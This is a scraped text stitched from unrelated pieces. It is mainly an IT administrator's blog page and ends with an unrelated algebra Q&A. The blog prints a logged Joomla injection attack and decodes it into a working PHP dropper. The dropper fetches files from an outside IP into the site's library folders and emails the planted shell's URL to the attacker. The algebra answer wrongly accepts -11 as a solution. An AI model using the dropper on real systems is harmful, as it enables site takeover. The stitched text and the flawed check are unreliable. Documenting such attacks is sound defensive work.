xzWlY5bGVHbHpkSE1vSkdOb1pXTnJNaWtwZXcwS0lDQWdJR1ZqYUc4Z0pHTm9aV05yTWk0aVBDOWljajRpT3cwS2ZXVnNjMlVnRFFvZ0lHVmphRzhnSW01dmRDQmxlR2wwY3pJaU93MEtaV05vYnlBaVpHOXVa VElnTGx4dUlDSWdPdzBLRFFva1kyaGxZMnN6UFNSZlUwVlNWa1ZTV3lkRVQwTlZUVVZPVkY5U1QwOVVKMTBnTGlBaUwzY3VhSFJ0SWlBN0RRb2tkR1Y0ZERNZ1BTQm9kSFJ3WDJkbGRDZ25hSFIwY0Rvdkx6Yz BMakl3T0M0ME55NDFNaTluWlhRdmR5NTBlSFFuS1RzTkNpUnZjRE05Wm05d1pXNG9KR05vWldOck15d2dKM2NuS1RzTkNtWjNjbWwwWlNna2IzQXpMQ1IwWlhoME15azdEUXBtWTJ4dmMyVW9KRzl3TXlrN0RR tDZG9kSFJ3T2k4dk56UXVNakE0TGpRM0xqVXlMMmRsZEM5akxuUjRkQ2NwT3cwS0pHOXdORDFtYjNCbGJpZ2tZMmhsWTJzMExDQW5keWNwT3cwS1puZHlhWFJsS0NSdmNEUXNKSFJsZUhRMEtUc05DbVpqYkc5 elpTZ2tiM0EwS1RzTkNnMEtKR05vWldOck5UMGtYMU5GVWxaRlVsc25SRTlEVlUxRlRsUmZVazlQVkNkZElDNGdJaTlzYVdKeVlYSnBaWE12YW05dmJXeGhMMnB0WVdsc2N5NXdhSEFpSURzTkNpUjBaWGgwTl WlhoME5TazdEUXBtWTJ4dmMyVW9KRzl3TlNrN0RRb05DaVJqYUdWamF6WTlKRjlUUlZKV1JWSmJKMFJQUTFWTlJVNVVYMUpQVDFRblhTQXVJQ0l2YkdsaWNtRnlhV1Z6TDJwdmIyMXNZUzlxZFhObGNpNXdhSE bmR5YVhSbEtDUnZjRFlzSkhSbGVIUTJLVHNOQ21aamJHOXpaU2drYjNBMktUc05DZzBLSkhSdmVpQTlJQ0puWVdKaWVTNWpZWE5vUUhsaGJtUmxlQzVqYjIwc2IyeHZhbVZ6YUdGcllYSmhRR2R0WVdsc0xtTn ZiU0k3RFFva2MzVmlhbVZqZENBOUlDZEtiMjBnZW5wNklDY2dMaUFrWDFORlVsWkZVbHNuVTBWU1ZrVlNYMDVCVFVVblhUc05DaVJvWldGa1pYSWdQU0FuWm5KdmJUb2dTMlZyYTJGcElGTmxibk5sYmlBOGRt OXVVbVZwYm1obGNucExiR0YxYzBCVFlXbHJiM1Z1WVVocFlta3VZMjl0UGljZ0xpQWlYSEpjYmlJN0RRb2tiV1Z6YzJGblpTQTlJQ0pUYUdWc2JIb2dPaUJvZEhSd09pOHZJaUF1SUNSZlUwVlNWa1ZTV3lkVF JWSldSVkpmVGtGTlJTZGRJQzRnSWk5c2FXSnlZWEpwWlhNdmFtOXZiV3hoTDJwdFlXbHNMbkJvY0Q5MUlpQXVJQ0pjY2x4dUlpQXVJSEJvY0Y5MWJtRnRaU2dwSUM0Z0lseHlYRzRpT3cwS0pITmxiblJ0WVds c0lEMGdRRzFoYVd3b0pIUnZlaXdnSkhOMVltcGxZM1FzSUNSdFpYTnpZV2RsTENBa2FHVmhaR1Z5S1RzTkNnMEtRSFZ1YkdsdWF5aGZYMFpKVEVWZlh5azdEUW9OQ2cwS1B6ND0nKSk7DQpmY2xvc2UoJGZwKT s='));JFactory::getConfig();exit\";s:19:\"cache_name_function\";s:6:\"assert\";s:5:\"cache\";b:1;s:11:\"cache_class\";O:20:\"JDatabaseDriverMysql\":0:{}}i:1;s :4:\"init\";}}s:13:\"\\0\\0\\0connection\";b:1;}\xf0\xfd\xfd\xfd" =============================================== This translates into: =============================================== $check =$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/lol.php" ; $fp=fopen("$check","w+"); fwrite($fp,base64_decode('PD9waHANCmZ1bmN0aW9uIGh0dHBfZ2V0KCR1cmwpew0KCSRpbSA9IGN1cmxfaW5pdCgkdXJsKTsNCgljdXJsX3NldG9wdCgkaW0sIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9DT05ORUNUVElNRU9VVCwgMTApOw0KCWN1cmxfc2V0b3B0KCRpbSwgQ1VSTE9QVF9GT0xMT1dMT0NBVElPTiwgMSk7DQoJY3VybF9zZXRvcHQoJGltLCBDVVJMT1BUX0hFQURFUiwgMCk7DQoJcmV0dXJuIGN1cmxfZXhlYygkaW0pOw0KCWN1cmxfY2xvc2UoJGltKTsNCn0NCiRjaGVjayA9ICRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL2xpYnJhcmllcy9qb29tbGEvY3NzLnBocCIgOw0KJHRleHQgPSBodHRwX2dldCgnaHR0cDovLzc0LjIwOC40Ny41Mi9nZXQvY3NzLnR4dCcpOw0KJG9wZW4gPSBmb3BlbigkY2hlY2ssICd3Jyk7DQpmd3JpdGUoJG9wZW4sICR0ZXh0KTsNCmZjbG9zZSgkb3Blbik7DQppZihmaWxlX2V4aXN0cygkY2hlY2spKXsNCiAgICBlY2hvICRjaGVjay4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0cyI7DQplY2hvICJkb25lIC5cbiAiIDsNCiRjaGVjazIgPSAkX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlsLnBocCIgOw0KJHRleHQyID0gaHR0cF9nZXQoJ2h0dHA6Ly83NC4yMDguNDcuNTIvZ2V0L20udHh0Jyk7DQokb3BlbjIgPSBmb3BlbigkY2hlY2syLCAndycpOw0KZndyaXRlKCRvcGVuMiwgJHRleHQyKTsNCmZjbG9zZSgkb3BlbjIpOw0KaWYoZmlsZV9leGlzdHMoJGNoZWNrMikpew0KICAgIGVjaG8gJGNoZWNrMi4iPC9icj4iOw0KfWVsc2UgDQogIGVjaG8gIm5vdCBleGl0czIiOw0KZWNobyAiZG9uZTIgLlxuICIgOw0KDQokY2hlY2szPSRfU0VSVkVSWydET0NVTUVOVF9ST09UJ10gLiAiL3cuaHRtIiA7DQokdGV4dDMgPSBodHRwX2dldCgnaHR0cDovLzc0LjIwOC40Ny41Mi9nZXQvdy50eHQnKTsNCiRvcDM9Zm9wZW4oJGNoZWNrMywgJ3cnKTsNCmZ3cml0ZSgkb3AzLCR0ZXh0Myk7DQpmY2xvc2UoJG9wMyk7DQoNCiRjaGVjazQ9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9jaGVjay5waHAiIDsNCiR0ZXh0NCA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC9jLnR4dCcpOw0KJG9wND1mb3BlbigkY2hlY2s0LCAndycpOw0KZndyaXRlKCRvcDQsJHRleHQ0KTsNCmZjbG9zZSgkb3A0KTsNCg0KJGNoZWNrNT0kX1NFUlZFUlsnRE9DVU1FTlRfUk9PVCddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlscy5waHAiIDsNCiR0ZXh0NSA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC9tbS50eHQnKTsNCiRvcDU9Zm9wZW4oJGNoZWNrNSwgJ3cnKTsNCmZ3cml0ZSgkb3A1LCR0ZXh0NSk7DQpmY2xvc2UoJG9wNSk7DQoNCiRjaGVjazY9JF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXSAuICIvbGlicmFyaWVzL2pvb21sYS9qdXNlci5waHAiIDsNCiR0ZXh0NiA9IGh0dHBfZ2V0KCdodHRwOi8vNzQuMjA4LjQ3LjUyL2dldC91c2VyLnR4dCcpOw0KJG9wNj1mb3BlbigkY2hlY2s2LCAndycpOw0KZndyaXRlKCRvcDYsJHRleHQ2KTsNCmZjbG9zZSgkb3A2KTsNCg0KJHRveiA9ICJnYWJieS5jYXNoQHlhbmRleC5jb20sb2xvamVzaGFrYXJhQGdtYWlsLmNvbSI7DQokc3ViamVjdCA9ICdKb20genp6ICcgLiAkX1NFUlZFUlsnU0VSVkVSX05BTUUnXTsNCiRoZWFkZXIgPSAnZnJvbTogS2Vra2FpIFNlbnNlbiA8dm9uUmVpbmhlcnpLbGF1c0BTYWlrb3VuYUhpYmkuY29tPicgLiAiXHJcbiI7DQokbWVzc2FnZSA9ICJTaGVsbHogOiBodHRwOi8vIiAuICRfU0VSVkVSWydTRVJWRVJfTkFNRSddIC4gIi9saWJyYXJpZXMvam9vbWxhL2ptYWlsLnBocD91IiAuICJcclxuIiAuIHBocF91bmFtZSgpIC4gIlxyXG4iOw0KJHNlbnRtYWlsID0gQG1haWwoJHRveiwgJHN1YmplY3QsICRtZXNzYWdlLCAkaGVhZGVyKTsNCg0KQHVubGluayhfX0ZJTEVfXyk7DQoNCg0KPz4=')); fclose($fp); ================================================ Which further is decoded to: ================================================ <?php function http_get($url){$im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close($im); }$check = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/css.php" ;$text = http_get('http://74.208.47.52/get/css.txt'); $open = fopen($check, 'w'); fwrite($open,$text); fclose($open); if(file_exists($check)){ echo $check."</br>"; }else echo "not exits"; echo "done .\n " ;$check2 = $_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmail.php" ;$text2 = http_get('http://74.208.47.52/get/m.txt'); $open2 = fopen($check2, 'w'); fwrite($open2,$text2); fclose($open2); if(file_exists($check2)){ echo $check2."</br>"; }else echo "not exits2"; echo "done2 .\n " ;$check3=$_SERVER['DOCUMENT_ROOT'] . "/w.htm" ;$text3 = http_get('http://74.208.47.52/get/w.txt'); $op3=fopen($check3, 'w'); fwrite($op3,$text3); fclose($op3);$check4=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/check.php" ;$text4 = http_get('http://74.208.47.52/get/c.txt'); $op4=fopen($check4, 'w'); fwrite($op4,$text4); fclose($op4);$check5=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/jmails.php" ;$text5 = http_get('http://74.208.47.52/get/mm.txt'); $op5=fopen($check5, 'w'); fwrite($op5,$text5); fclose($op5);$check6=$_SERVER['DOCUMENT_ROOT'] . "/libraries/joomla/juser.php" ;$text6 = http_get('http://74.208.47.52/get/user.txt'); $op6=fopen($check6, 'w'); fwrite($op6,$text6); fclose($op6);$toz = " This e-mail address is being protected from spambots. You need JavaScript enabled to view it , This e-mail address is being protected from spambots. You need JavaScript enabled to view it "; $subject = 'Jom zzz ' .$_SERVER['SERVER_NAME']; $header = 'from: Kekkai Sensen < This e-mail address is being protected from spambots. You need JavaScript enabled to view it >'; document.write( '' ); document.write( addy_text83189 ); document.write( '<\/a>' ); //--> This e-mail address is being protected from spambots. You need JavaScript enabled to view it ;' . "\r\n";$message = "Shellz : http://" . $_SERVER['SERVER_NAME'] . "/libraries/joomla/jmail.php?u" . "\r\n" . php_uname() . "\r\n";$sentmail = @mail($toz,$subject, $message,$header); ?> =============================================== Nice try... but not this time. Hacking Attempt 16-05 Here's a recent hacking attempt into a hosted web site. The hacking attempt is from webmeup-crawler.com ============================= ============================== This translates into: ============================== <script type='text/javascript'> <!-- var prefix = 'ma'   'il'   'to'; var path = 'hr'   'ef'   '='; var addy64466 = 'PetersHyland'   '@'; addy64466 = addy64466   'ipre'   '.'   'com'; document.write('<a '   path   '\''   prefix   ':'   addy64466   '\'>'); document.write(addy64466); document.write('<\/a>'); /-->\n </script><script type='text/javascript'> <!-- document.write('<span style=\'display: none;\'>'); /--> </script>This email address is being protected from spambots. You need JavaScript enabled to view it. <script type='text/javascript'> <!-- document.write('</'); document.write('span>'); /--> </script> ============================== This was repeated in a brute force attack, changing the password for every attemtp. Nice one... but not this time. Clean Install Windows 10 Clean installing Windows 10 can be a pain. There's too many gotchas that it can be frustrating. Here's how I did it: • -after your have created the USB, check to make sure you have the right BUILD NUMBER (see other article post). • -SKIP PRODUCT KEY DURING INSTALL (OR "Do This Later or I Don't Have a Key"). Save the activation after install with your Windows 7, 8 or 8.1 Product Key, even if embedded in BIOS. (NOTE: this is in contrast to the WINDOWS 8 that requires to NOT select "I don't have a product key" as activation will not be successful. ) Find Windows 10 ISO Version or Build Number Finding the Windows 10 ISO version or Build Number is important because builds starting in November 2015 and newer allow you to clean install Windows 10 if you have Windows 7 or Windows 8. • -mount the ISO to expose the files. This can be done through Windows 10, if you have another computer available or through VirtualCD. • -find where the "install.wim" (or install.esd) is. For example; F:\sources\install.wim • -open CMD • -type: dism /Get-WimInfo /WimFile:F:\sources\install.wim /index:1 • -or if Windows 10 install.esd file, type: dism /Get-WimInfo /WimFile:F:\sources\install.esd /index:1 This will show the details of the INSTALL.WIM file. NOTE: -in some cases, Windows-7 will not be able to read a Windows-10 install.esd file :-( Re-enable Mailbox in Exchange 2013 If you disable a MAILBOX in EXCHANGE, the account is available for 30 days by default. However if you disable a MAILBOX in EXCHANGE and you disable an AD account, the MAILBOX will not show as a disconnected MAILBOX. Here's how to get it back on demand. First, check to see the RETENTION settings of the MAILBOXDATABASE: $Get-MailboxDatabase "Mailbox-Database-Name-Here" | fl | grep MailboxRetention Now, let's make sure that the MAILBOX is still in the MAILBOXDATABASE:$Get-MailboxStatistics -Database "Mailbox-Database-Name-Here" You will see all the accounts. Once you see the account that you want back, you will need the full DISPLAY NAME of the account needed. $Get-MailboxStatistics -Database "Mailbox-Database-Name-Here" | fl | grep -i any-part-of-account-name-here Lastly, let's reconnect the MAILBOX and connect it to an ACCOUNT:$Get-MailboxDatabase -Identity "Mailbox-Database-Name-Here"  | Get-MailboxStatistics | Where { \$_.Displayname -eq "full-display-name-here)" } | Connect-Mailbox -User "username-here" Windows 8/8.1/10 Product Keys SITUATION You have a new computer and you test out Linux destroying everything on the hard drive. You go to reinstall Windows and you realize that you do not have the PRODUCT KEY. There is no label on the side/back/inside of the pc. You have an OEM Windows 8.1 disk. The pc does not have a DVD drive. RESOLUTION Find a pc that has a DVD drive. 1-create an ISO with 7ZIP. • -select the DVD DRIVE. • -click VIEW (at the top). • -click OPEN ROOT FOLDER. • -click VIEW (at the top). • -click UP ONE LEVEL. • -in the main window you will see: \\. (backslash, backslash, dot). • -double-click \\. • -select the DVD drive. • -click FILE > COPY-TO (at the top) • -select the folder where you want the ISO to go. 2-copy that ISO to your EASY2BOOT USB. • -easy squeezy. NOTE: if you do not have one, get one. It's super easy. Run tool. Have USB. 3-install WINDOWS. • -the install should use the PRODUCT KEY from the UEFI (or in laymans terms BIOS). • -if you are being prompted for a product key, it means that you have the wrong installation media and that's when the Windows 8.1/10 installer can't detect Windows 8/8.1 product key from UEFI firmware (BIOS). • -it will prompt which version to install, WINDOWS 8.1, WINDOWS 8.1 CORE, WINDOWS 8.1 SINGLE LANGUAGE (same as PRO), WINDOWS 8.1 PRO • -do NOT select "I don't have a product key". Activation will not be successful. 4-find WINDOWS PRODUCT KEY in the UEFI. • -open the tool. • -click ACPI (at the top). • -click MSDM tab (towards the top) • -look at the last line, it is the embedded PRODUCT KEY ;-) There are other ways to do this such as: • -open COMMAND PROMPT. • -type: WMIC Path SoftwareLicensingService Get OA3xOriginalProductKey As well as other ways. NOTES: Wrong Time on Ubuntu - NTP SCENARIO Fresh install of Ubuntu. Wrong time. Day later, still wrong time. HOW TO FIX THE WRONG TIME ON UBUNTU • -edit /etc/ntp.conf • -comment out the "pool" servers. • -comment out the fallback "pool" server. • -type: server 192.168.1.1 (or local server/router/switch that can provide NTP services) • -save • -stop service: /etc/init.d/ntp stop • -start service: /etc/init.d/ntp start This may happen for various reasons. For me, the high-end firewall was blocking outside NTP servers from talking on port 123. NOTES: do not use/install ntpdate package, it is depreciated. Digital Watchdog Spectrum Client on Ubuntu 16.0.4 LTS Getting Digital Watchdog Spectrum Client on Ubuntu 16.0.4 LTS can be not-so-straight-forward especially if you are not from the Linux world. TO INSTALL: • open TERMINAL • type: sudo dkpg -i digitalwatchdog-client-2.4.1.10278-x64-release.deb • (NOTE: do not just double-click on the file. Do not install with UBUNTU SOFTWARE MANAGER). • go through the setup process. On UBUNTU 14.02, you are finished. On UBUNTU 16.0.4, you need the following: • type: sudo apt-get install libgstreamer-plugins-base0.10-dev That's it! You should now be able to use the Digital Watchdog Spectrum client. Testing HD with Smartctl & Finding the Filesystem Hmmm. Something is wrong with SDA. Let's test it: 1.smartctl -t short /dev/sda And look at the results: 1.smartctl -a /dev/sda The last 5 result log shows: Error: UNC 8 sectors at LBA = 0x00384622 = 3687970 SMART Self-test log structure revision number 1 Num Test_Description Status Remaining LifeTime(hours) LBA_of_first_error # 1 Short offline Completed: read failure 10% 44084 976766499 So we have to find the filesystem. Usually it would be: 1.# fdisk -lu /dev/sda I get: 1.Disk /dev/sda: 500.1 GB, 500107862016 bytes 2.255 heads, 63 sectors/track, 60801 cylinders, total 976773168 sectors 3.Units = sectors of 1 * 512 = 512 bytes 4.Device Boot Start End Blocks Id System 5./dev/sda1 * 1 208769 104384+ fd Linux raid autodetect 6.Partition 1 does not end on cylinder boundary. 7./dev/sda2 208770 976768063 488279647 fd Linux raid autodetect Using: ((976766499- 208770) * 512) / 4096 We get: 122069716 LBA block. But wait, the filesystem isn't on sda, it's on /dev/main/root. Here's how: 1.# cat /etc/fstab 1./dev/main/root / ext3 usrquota,grpquota 1 1 2./dev/md1 /boot ext3 defaults 1 2 3./dev/main/swap swap swap defaults 0 0 So we know files system is mounted at /dev/main/root and it is ext3 type. We can find the BLOCK SIZE by: 1.# tune2fs -l /dev/main/root | grep Block I get: 1.Block count:              121561088 2.Block size:               4096 3.Blocks per group:         32768 We're still at 122069716 LBA block. Or specifically 122069716.125 or the second of 8 sectors in this block. We can test the block by: 1.# debugfs 2.debugfs 1.39 (29-May-2006) 3.debugfs:  open /dev/main/root 4.debugfs:  testb 122069716 5.Illegal block number passed to ext2fs_test_block_bitmap #122069716 for block bitmap for /dev/main/root 6.Block 122069716 not in use 7.debugfs:  quit In short, it looks like this: ================================================================== sda1  sdb1 | md1 sdb1 sdb2 | md2 | pv (md2) | vg (main) /            \ lv (main/root)        lv (main/swap) Transfer Hard Drive to New Hardware Transfer hard drive to new hardware. It can be done. • -take note of current setup bios for the ATA, AHCI, RAID setup. • -run c:\windows\system32\sysprep\sysprep.exe • -click GENERALIZE • -wait an hour and let it shutdown. • -tranfer to new hardware. • -boot pc • -change bios to match old setup. • -wait for it to boot All of your stuff should be intact. If for some reason that doesn't work, you can always load the drivers in the Windows in an offline manner. • -find your motherboard model number. • -extract them to the C drive (for example: c:\drivers\chipset) • -boot into REPAIR MODE or start with WINDOWS OS INSTALL media (usb, CD, PXE, etc). • -click REPAIR YOUR COMPUTER (bottom-left). • -click COMMAND PROMPT. • -find what letter your WINDOWS-DIRECTORY is. • -type: dism /image:c:\ /add-driver /Driver:e:\install\chipset\ /recurse • -hit ENTER • -type EXIT • -reboot DNS Servers I love DNS servers. I really do. You ask a question, they give an answer. Here are some of the more popular ones. 4.2.2.1 4.2.2.2 4.2.2.3 4.2.2.4 4.2.2.5 8.8.8.8 8.8.4.4 137.65.1.1 137.65.1.2 137.65.1.3 75.75.75.75 75.75.76.76 OPENDNS SERVERS 208.67.222.222 208.67.220.220 You can use OPENDNS as a web content filtering tool to automatically block inappropriate content and keep children safe. To ask a question you can use DIG (*nix) or NSLOOKUP (Windows). I prefer DIG and install it on Windows rather easily via GNUWIN. • -open shell of some kind (putty, command, power, etc) • -type: dig daknetworks.com • -type: nslookup daknetworks.com To ask a question of a specific server: • -type: dig daknetworks.com @4.2.2.2 • -type: nslookup daknetworks.com 4.2.2.2 To ask a specific type of record: • -type: dig -t mx daknetworks.com • -type: nslookup set type=mx daknetworks.com To ask for an authoritative record: • -type: dig -t ns daknetworks.com • -type: nslookup -type=soa daknetworks.com To ask for all the info: • -type: nslookup -debug daknetworks.com 1.2.3.4 Clone MacBook Pro Hard Drive With Boot Camp I have a 128GB SSD HD and I want to upgrade to a newly acquired 512GB SSD HD. How do I upgrade my ssd hard drive to a larger ssd hard drive on my MacBook Pro? ps- I have Boot Camp with a Windows partition. pss- many posts claim this can't be done or post a really, really long and complicated instruction set. Don't believe them. ;-) • -clone the drive (clonezilla). • -resize the Windows Boot Camp partition (gparted). • -sync the partition tables (gparted). • -resize the OSX partition (diskutil). • -fix the Windows bootloader (Windows). NEEDED -usb with ubcd with parted magic (UBCD is universal boot cd). -host system. -Windows 7/8 cd/usb (or a Windows repair disk). CLONE -plug both ssd's into the host system. -boot via usb. -start parted-magic. -start clonezilla -clone disk to disk -wait till finished (this could take awhile) MOVE/RESIZE WINDOWS PARTITION -you should still be in parted-magic -start gparted -resize windows partition as needed (grab the handles) -move windows partition to the end -move the osx recovery boot loader next to the windows partition -apply changes -wait -after it's finished, if needed, you can fix the filesystem for both OSX and WINDOWS. SYNC FOR BOOT CAMP -you should still be in parted-magic -open terminal -type: sudo gptsync /dev/sda (or other device such as sdb sdc sdd. gparted will show you). -confirm Y -shutdown RESIZE OSX PARTITION -boot into os x with the new, larger hd. -open Disk Utility. -click the disk on the left hand side. -click the PARITION button (at the top). -select the volume you want to grow. -look at the info-window (at the bottom). -note the Disk Identifier (mine was disk0s2). -open Terminal. -type the following command: diskutil resizeVolume /dev/disk0s2 limits -it will show the current size, minimum size and maximum size. -note the maximum size (mine was 254.2GB. Do not get the part in parentheses.) -type the following command: sudo diskutil resizeVolume /dev/disk0s2 254.2GB (NOTE: the number above requires a GB but no space.) -wait. -shutdown This also works if you get messages like "No boot device found" etc. This happens when the items get fouled up. How do you know if items are fouled up? Boot MacBook Pro to Windows either: -through holding the OPTION key on boot up (after chime). -boot into OSX and go to SYSTEM-PREFERENCES and choose the START-UP DISK. -you will see "No boot device" or Windows is going into repair mode on it's own. In either case, the following will work as a full instruction set. Adjust as needed. -insert Windows 7/8 cd/usb (or a Windows repair disk). -boot while holding OPTION key. -wait for windows 7 cd/usb shows (it could take a minute). -select Windows 7. -click NEXT. -select REPAIR YOUR COMPUTER (bottom left). -click NO (for automatic repair). -click NEXT (at bottom right). -click COMMAND PROMPT. -type: bootrec /scanos. (If it isn't already there, it should find the WINDOWS installation and ask if you want to add it.) -type: Y -type: Diskpart -type: LIST DISK -type: SELECT DISK 0 (change this to the number of the disk . most likely 0) -type: LIST PARTITION -type: SELECT PARTITION 4 (change this to your partition number. most likely 4) -type: DETAIL PARTITION (it will show the details of the partition. We're trying to find the partition with the windows installation.) -if you found it, it will probably say ACTIVE: NO -type: ACTIVE -type: EXIT -type: bootrec /fixmbr (needed?) -type: bootrec /fixboot (needed?) -type: bootrec /rebuildbcd -type: exit -click RESTART CHECKDISK -when it restarts it will do a chkdsk. -let it finish. -it will reboot. -voila! You can bootcamp Windows! For diagnostic information, this is provided. -boot to osx -open terminal -type: diskutil list -type: sudo gpt -r -vv show disk0 -type: sudo fdisk /dev/disk0 DEFINITIONS boot manager: manages your booting process. This can actually be changed to REFIND, PLOP, LILO, GRUB2 and a few others. Fun stuff! Not for the faint of heart! (see here for boot loaders https://en.wikipedia.org/wiki/Comparison_of_boot_loaders) boot loader: load an OS kernel and hand off control of the computer to that kernel. /--bl-->k-->osx bm--|--bl-->k-->centos/rhel \--bl-->k-->win7/8/10 NOTES: Intel Rapid Storage Technology (RST) (IRST) I was going to write a blog post about SATA, AHCI, RAID, RST, IRST, ICH10R, X58 and the drivers needed along with the settings and the difference between the drivers and the software but this post does a better job than I ever would be able to (as well as better explanation than Intel does too): I will say that the SATA/AHCI/RAID/IRST drivers are driving the southbridge (ICH10R, etc) which is the HOST-CONTROLLER (aka DISK-CONTROLLER aka STORAGE-CONTROLLER) and that the CHIPSET drivers are driving the northbridge (X58, etc). Also, I will say that the speed of the SATA-I (150MB), SATA-II (300MB) or SATA-III (600MB) depends on both the HARD-DRIVE itself and the HOST-CONTROLLER. The easy ways to find the HOST-CONTROLLER speed is by using CPUID or HWINFO. Lastly, I'll say that you only need the RST if you are running in AHCI or RAID mode. If not, then you can use the chipset drivers. Quickbooks 2011 on Mac El Capitan Don't believe QUICKBOOKS support when they tell you that you have to upgrade to the newest version of QUICKBOOKS for MAC. QUICKBOOKS 2011 will work fine. In the spirit of "just fix it" here's how: Windows Package Manager You're familiar with RPM. Windows has a similar package manager. Windows has something similar for Windows packages only. It should be called WPM for Windows Package Manager but it's called DISM for Deployment Image Servicing and Management. <tirade>Can they not come up with something all by themselves that works? Must they continuously ripoff open-source projects and change a certain percentage so that they can get around law? Then be so terrible at implementation that it would be graded as a D project?</tirade> Show all Windows packages: dism /online /get-packages /Format:Table Find if a certain package is installed: dism /online /get-packages |findstr KB2919355 Remove package: Scan to see if there is corruption: dism /online /cleanup-image /scanhealth Report if there is corruption: dism /online /cleanup-image /checkhealth Repair if there is corruption: dism /online /cleanup-image /restorehealth Restore to a source image: dism /online /cleanup-image /restorehealth /source:wim:d:\your\source\here\install.wim:1 /limitaccess Remove old versions of packages: dism /online /cleanup-image /startcomponentcleanup Lock in all packages and service-package so that they cannot be uninstalled: dism /online /cleanup-image /startcomponentcleanup /resetbase Check to see if you have bad sectors on a disk: • -use HDTUNE This will give a graphical representation of any bad sectors on the disk. It will mark it as red. If you have bad sectors, it isn't the end of the world. We can mark them as bad so that those sectors won't be used any more. If you have 1-9 bad sectors, this isn't a problem. If you have more than 9 then most likely the issue will grow. More bad sectors will show and then the drive will become useless. Fix bad sectors on a disk: • -use UBCD > HDD > DIAGNOSTICS > HDAT2 • -type: HDAT2 • -select the disk by using the arrows keys on keyboard. • -hit ENTER. • -select VERIFY/WRITE/VERIFY • -let it run all the way through. In my experience, if too many bad sectors happen, it's easier to clone the drive and move on with the data loss. At that point, the data might be able to be replaced/repaired. Cloning can be done with Clonzilla or many other tools. I prefer DDRESCUE as in this article. Again, there are so manu tools in this area like DATA-LIFEGUARD, SEATOOLS, CRYSTALDISKINFO, etc that it's hard to know what to use and what not to bother with. The above reference of: • HDTUNE • HDAT2 • DDRESCUE is a good start. I wish I retained all the info I've learned and used in the past but most of it escapes me now. No doubt that a data expert will have his or her own choice set of tools. I'd love to hear about them! Page 1 of 4 • « •  Start •  Prev •  1 •  2 •  3 •  4 •  Next •  End • »
2017-12-17 04:01:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.30975350737571716, "perplexity": 14211.82696020347}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2017-51/segments/1512948592972.60/warc/CC-MAIN-20171217035328-20171217061328-00070.warc.gz"}
https://socratic.org/questions/how-do-you-solve-sqrt-2a-2-121-a-and-check-your-solution
How do you solve sqrt(2a^2-121)=a and check your solution? Jan 26, 2017 $a = \pm 11$ Explanation: $a = \sqrt{2 {a}^{2} - 121}$ Square both sides ${a}^{2} = 2 {a}^{2} - 121$ Minus ${a}^{2}$ and add $121$ to both sides ${a}^{2} = 121$ Square root both sides $a = \pm \sqrt{121} = \pm 11$ Now to check: $a = \sqrt{2 \times {11}^{2} - 121} = \sqrt{242 - 121} = \sqrt{121} = \pm 11$
2019-09-19 07:08:48
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 8, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.2900923490524292, "perplexity": 4337.931749990392}, "config": {"markdown_headings": false, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2019-39/segments/1568514573444.87/warc/CC-MAIN-20190919060532-20190919082532-00229.warc.gz"}
http://math.stackexchange.com/tags/stochastic-integrals/hot
